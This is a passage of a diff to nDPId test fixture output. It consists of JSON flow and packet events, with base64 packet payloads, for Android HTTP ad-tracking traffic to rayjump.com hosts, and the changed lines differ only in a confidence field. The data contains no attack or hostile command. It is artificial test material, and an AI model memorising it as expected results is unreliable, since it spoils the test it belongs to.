9NMGhkenVERjU2aHJjYlJVRUFpVTMlMkZmVTNCaUJNMEo3YzlSVUVlV296ckRrd1FSVUVlV296dEprZlRMa0slMkZSVUVlV296dEhRS1REJTJCbDBHVWlCR1o5RkduUkFXb3pNaHJRVUg1S0JIMFIxaUFSUFdVRFBpVWlzUmdTQkxrZlElMkJienJKb1IxaUFSUFdVRFBpVWlzUmdTQkxrZlElMkJienJKN2owR1VpQkdaOUZHblJBV296cmhkenVERlYwR1VpJTJGaVUzRkduUkFXb3p0SmRRTUhaUjFpWk0wTDdEMEdVdnNSZ2ZRRDJLTWhyUVVIWlIxaVVWTVdvelVKJTJCekJIa1BVNFpSMVJRNW54b1JzUmd6VERraDBHZ3MwSjdIc1liaDBHMHpyZlpSc1JneEVIazJ1aEJSMVJyS1RMNzVCaEJ6S1dvekFEZ3h0SEJSMVIzUndIZGZNVzV4WlJnMklpZGVJNmRlSTZkTWI2YVJiaW5SZTZhU0k2ZHMwWXI1VEhCUjFSMHpLNmF2JTNEIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGRlMDEucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com","url":"de01.rayjump.com\/onlyImpression?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMM6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIGnR%2FiUjPWUNMWURAf%2BeIiB9eiUj%2FiURTWUhA6deIDUQQiUlbfADAfnx3iUVPH%2BM2DkiFDnSrH0T9Haj9WnNbDriwDn3Mi0TBGajBDFDMDAR2ik5I6ajMigMBidMe6aSIinh1GUcI67KMHkPth7QI67cbhFH8LAtA6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb6aRbinRe6aSI6ds0Yr5THBR1R0zK6av%3D","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229375,"flow_last_seen":1654385229375,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1654385229375,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com","url":"de01.rayjump.com\/onlyImpression?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMM6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIGnR%2FiUjPWUNMWURAf%2BeIiB9eiUj%2FiURTWUhA6deIDUQQiUlbfADAfnx3iUVPH%2BM2DkiFDnSrH0T9Haj9WnNbDriwDn3Mi0TBGajBDFDMDAR2ik5I6ajMigMBidMe6aSIinh1GUcI67KMHkPth7QI67cbhFH8LAtA6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb6aRbinRe6aSI6ds0Yr5THBR1R0zK6av%3D","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1654385229376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":548,"pkt_l4_len":514,"thread_ts_msec":1654385229376,"pkt":"tKXvZygQnLbQ0+MzCABFAAIWbkpAAEAGIaPAqAJ+NB2xsZDsAFBe8KPGSC8RAoAYAfaq\/QAAAQEICgB7lmTzZF3LZXFkc3BzPTUyJTJDNzElMkM1NyUyQzY2JTJDNjMlMkM0NSUyQzU4JTJDMiUyQzY4JTJDNTUlMkM3MCUyQzI4JTJDNDYlMkM2OSUyQzYyJTJDNjUlMkM1MSUyQzYxJTJDNDMlMkM1OSUyQzE1JTJDOSUyQzcyJTJDNTMlMkM2NyZyZmVjcG09MCZyZXNwdD0xJnNpcD0xNzIuMzEuMS4yMzImb3J0ZD0yJmJkbj1jb20uc2NlbmV3YXkua2Fua2FuLm1hcmtldDMma2V5PXBsYXkmcmF0ZT0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGFkeC10ay5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385229377,"pkt":"tKXvZygQnLbQ0+MzCABFAAXUXuxAAEAGw2jAqAJ+I5wsDaZGAFB7fWmugsWKk4AQAfYYlgAAAQEIChlnEfsPV8RHR0VUIC9pbXByZXNzaW9uP2s9NjI5YmVhMjBhNGU1NDEwMDAxZjAxYzd4Jm1wPWZVUlBEcjV0aVVTdGY3VjJmYWpNaWF2ZUhVdmVEQUo5NmFpUGZVNUlpQVJUZm5ISUdhbDlpJTJCTWVmYk1lZkFFZUduM1RmYWlGZm5SUEduRWU2anhjNmFSQUdheElpJTJCTVBmZE1laSUyQmV3RGtlNkdvOWJXVXhJaTA5OVdVUiUyRmklMkJlZ1lGS2dZNzVJaEZ4OCUyQkZKTUw3SyUyRkg1SzlHYUhJaW5oUGZkbGVpYWxNNmF6SUhrUElHJTJCZUlHblIlMkZpVWpQV1VOTVdVUkFmJTJCZUlpQjllaVVqJTJGaVVSVFdVaEE2ZGVJRFVRUWlVbGJmQURBZm54M2lVVlBIJTJCTTJEa2lGRG5TckgwVDlIYWo5V25OYkRyaXdEbjNNaTBUQkdhakJERkRNREFSMmlrNUk2YWpNaWdNQmlkTWU2YVNJaW5oMUdVZkk2N0tNSGtQdGg3UUk2N2NiaEZIOExBdEE2ZHMwSjc1d2hqUTNSVXVPUlUzTWZvUjFpJTJCMks2ZHMwREZsMEdVak1pYXZlV296M2hiU3VIb1IxZlVWc1JyZnVIb1IxUlVqVGlBbFRmWlJzUnJjM1laUjFrQnp0NHJjQlk3UUZIWlBVWUZUMCUyQlpNMERyTjBHMHpVWUZUJTJGRCUyQnV0aHJldUpyViUyRkRrUDNockt1SG9Sc1JnU0JMa2ZRJTJCRlElMkZSVUVBaVUzJTJGZlUzQmlCTTBoZHp1REY1NlliNVRSVUVBaVUzJTJGZlUzQmlCTTBMJTJCZjZMN1IwR1V2c1JnU0JMa2ZRJTJCYnp0SkJSMWlBUlBXVURQaVVpc1JneHQ0b1IxaVpNMEhyYzhIWlIxaVpNMEQlMkI1VUo3UVhZMFIxaVpNMERrSDZKN2M5UlVFQWlVMyUyRmZVM0JpQk0waGR6dURGNTZockQwR1VpQkdaOUZHblJBV296TWhyUVVINUtCSGdOMEdVaUJHWjlGR25SQVdvek1oclFVSDVLQkhneHRSVUVBaVUzJTJGZlUzQmlCTTBIZ1NCTGtmUVJVRUFXVVJQZlUzQmlCTTBEJTJCeFBoN1YwR1Vqc1JydHJSVUVNV296QUhrZjZoZHp1REZWMEdVUjJpb00wRGI1QmhyNSUyRkRiMzBHMHo1VlROMFdvekJKN2NnUlV1T1JneHJZN0tiUlVFMEhVVjBXb3pUTDc1d0wlMkJpMEcwelhKN3RRaGdpMDZaTTBoRnpURGtoMEcwem9Xa3hBaG8yVlYweks2YVNJNmRlSTZkZU9ScjVVSGROMEdVakFpYVJzUnJ4QWhjS1VoclEzUlVFZWZhUkZHbmxNaWEzOVdvelRERnhUUlVFMDQyTTBZJTJCSDZMZFEwTCUyQnozJTJCRnglMkZoMk0wR1VScyUyQm96TVlqeCUyRmgyTTBHVWNLUjBNMEo3d1VZMFIxaW9NMEpyUTMlMkJGSFVSVUVlV296dEhkZk1Ea2ZRJTJCYnhQaDdWMEdVdnNScjJ0Sjc1QkxrY3MlMkJieFBoN1YwR1V2c1JyUUYlMkJieE1ZY0tUUlVFTVdvelRoN3hUSm9SMWlvTTBERnglMkYlMkJieDNEa3pUUlVFMERuajA2JTJCTWI2YVJiaW5SZTZhU0k2ZHMwWXI1VEhCUjFSMHpLNmFSJTNEIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vj"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229377,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1654385229377,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1654385229377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1654385229377,"pkt":"tKXvZygQnLbQ0+MzCABFAABIXu1AAEAGyPPAqAJ+I5wsDaZGAFB7fW9OgsWKk4AYAfYTCgAAAQEIChlnEfsPV8RHa28pIFZlcnNpb24vNC4wIENocm8="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1315,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1315,"pkt_l4_len":1281,"thread_ts_msec":1654385229378,"pkt":"tKXvZygQnLbQ0+MzCABFAAUV94ZAAEAGGcTAqAJ+EkBPMqPUAFBRMOE7Lwf8VoAYAfYpoAAAAQEICgCrWABx+rveR0VUIC9hZC9sb2cvcGxheT9rPTYyOWJlYTIwYTRlNTQxMDAwMWYwMWM3eCZtcD1mVVJQRHI1dGlVU3RmN1YyZmFqTWlhdmVIVXZlREFKOTZhaVBmVTVJaUFSVGZuSElHYWw5aSUyQk1lZmJNZWZBRWVHbjNUZmFpRmZuUlBHbkVlNmp4YzZhUkFHYXhJaSUyQk1QZmRNZWklMkJld0RrZTZHbzliV1V4SWkwOTlXVVIlMkZpJTJCZWdZRktnWTc1SWhGeDglMkJGSk1MN0slMkZINUs5R2FISWluaFBmZGxlaWFsTTZheklIa1BJRyUyQmVJaWRNTTZhU0k2ZGUwR2tWQkdhaGJmVWkyZjdOQmZuUVE2YTV0REFIdGk3SHJXbnQzaW5sd2ZhSjBEQjJ0R252QlduUjlpbnpVSFVTVWlVVmVIJTJCZUlpbnZCNmFSTTZhY0lpZE1lZkFFMWliZUlZYlNRWXJjTUwlMkJlSTZhU0k0QnpVTG9SMWludk1pYWpzUnJ4QWg3UTNSVUVGZlpNMERGUTNSVUUwaW5OQUdhTjJSME0wRGt4d1JVdVlScmMxRCUyQnpzTCUyQkhRV3JmWFlaekpXb3owSG9SMVJyZlhZWlB0NHJjQlk3UUZIWlB0WXJ4QllGUTNSME0waGR6dURGNTZMazkwR1VpQkdaOUZHblJBV296TWhyUVVINUtYSiUyQk4wR1VpQkdaOUZHblJBV296dWgyS0VEMFIxaW9NMGhkenVERjU2aHJjYlJVRUFpVTMlMkZmVTNCaUJNMEo3YzlSVUVlV296ckRrd1FSVUVlV296dEprZlRMa0slMkZSVUVlV296dEhRS1REJTJCbDBHVWlCR1o5RkduUkFXb3pNaHJRVUg1S0JIMFIxaUFSUFdVRFBpVWlzUmdTQkxrZlElMkJienJKb1IxaUFSUFdVRFBpVWlzUmdTQkxrZlElMkJienJKN2owR1VpQkdaOUZHblJBV296cmhkenVERlYwR1VpJTJGaVUzRkduUkFXb3p0SmRRTUhaUjFpWk0wTDdEMEdVdnNSZ2ZRRDJLTWhyUVVIWlIxaVVWTVdvelVKJTJCekJIa1BVNFpSMVJRNW54b1JzUmd6VERraDBHZ3MwSjdIc1liaDBHMHpyZlpSc1JneEVIazJ1aEJSMVJyS1RMNzVCaEJ6S1dvekFEZ3h0SEJSMVIzUndIZGZNVzV4WlJnMklpZGVJNmRlSTZkTWImdHlwZT1yZXdhcmRfdmlkZW8ma2V5PXBsYXlfcGVyY2VudGFnZSZyYXRlPTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KSG9zdDogdGtuZXQtY2RuLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"tknet-cdn.rayjump.com","url":"tknet-cdn.rayjump.com\/ad\/log\/play?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMefAEeGn3TfaiFfnRPGnEe6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIidMM6aSI6de0GkVBGahbfUi2f7NBfnQQ6a5tDAHti7HrWnt3inlwfaJ0DB2tGnvBWnR9inzUHUSUiUVeH%2BeIinvB6aRM6acIidMefAE1ibeIYbSQYrcML%2BeI6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb&type=reward_video&key=play_percentage&rate=0","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"tknet-cdn.rayjump.com","url":"tknet-cdn.rayjump.com\/ad\/log\/play?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMefAEeGn3TfaiFfnRPGnEe6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIidMM6aSI6de0GkVBGahbfUi2f7NBfnQQ6a5tDAHti7HrWnt3inlwfaJ0DB2tGnvBWnR9inzUHUSUiUVeH%2BeIinvB6aRM6acIidMefAE1ibeIYbSQYrcML%2BeI6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb&type=reward_video&key=play_percentage&rate=0","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1654385229379,"pkt":"tKXvZygQnLbQ0+MzCABFAACkXu5AAEAGyJbAqAJ+I5wsDaZGAFB7fW9igsWKk4AYAfYTZgAAAQEIChlnEfwPV8RHbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiBkZTAxLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385229377,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":524,"midstream":1,"thread_ts_msec":1654385229379,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com"}} +00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385229377,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":524,"midstream":1,"thread_ts_msec":1654385229379,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com"}} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2513,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1654385229398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1654385229398,"pkt":"nLbQ0+MztKXvZygQCABFAADQ2J9AAPUGmbgjnCwNwKgCfgBQpjo7f\/DX8zWzN4AYAHOmEwAAAQEICg9XxGYZZxH5SFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47IGNoYXJzZXQ9dXRmLTgNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6Mjc6MDkgR01UDQpTZXJ2ZXI6IG5naW54DQpDb250ZW50LUxlbmd0aDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQox"} 